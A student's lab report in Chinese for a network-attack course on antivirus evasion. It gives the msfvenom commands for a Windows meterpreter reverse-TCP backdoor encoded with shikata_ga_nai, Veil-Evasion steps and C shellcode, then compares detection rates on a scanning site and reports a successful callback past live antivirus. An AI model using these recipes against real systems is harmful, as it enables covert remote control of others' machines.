20155338《网络对抗》Exp3 免杀原理与实践
20155338《网络对抗》Exp3 免杀原理与实践
实验过程
一、免杀效果参考基准
Kali使用上次实验msfvenom产生后门的可执行文件,上传到老师提供的网址http://www.virscan.org/上进行扫描,有48%的杀软报告病毒。
二、使用msf编码器
- 编码一次,在Kali输入命令
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的IP LPORT=5338端口号 -f exe >后门名字.exe
结果被查出率降低了,可能是因为进行了编码的缘故,所以网站监测结果降低了 5个百分点。
- 多次编码,在Kali中输入命令
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=kali的IP LPORT=5338端口号 -f exe > 后门名字.exe
多次编码好像和第一次的结果差不多,恢复后依然放入网站检查。
三、使用Veil-Evasion重新编写源代码
-
这里直接使用的是老师的Kali,veil已经安装好。
-
在Kali的终端中启动Veil-Evasion
-
命令行中输入veil,后在veil中输入命令use evasion
-
依次输入如下命令生成你的可执行文件:
use c/meterpreter/rev_tcp.py
-
set LHOST Kali的IP
-
set LPORT 端口号
-
generate
-
可执行文件的文件名
扫描结果
四、C语言调用Shellcode
-
首先,在Kali上使用命令生成一个c语言格式的Shellcode数组。
-
由VS编译运行生成一个.exe文件
-
之后放入网站进行检测,效果还比较客观,只有百分之20的被查出率
五、实测进行回连
- 按照上次实验用过的msf监听方法在Kali上打开监听,在Win主机开启杀软的情况下,运行最后生成的优化版exe文件,Kali成功获取了Win主机的权限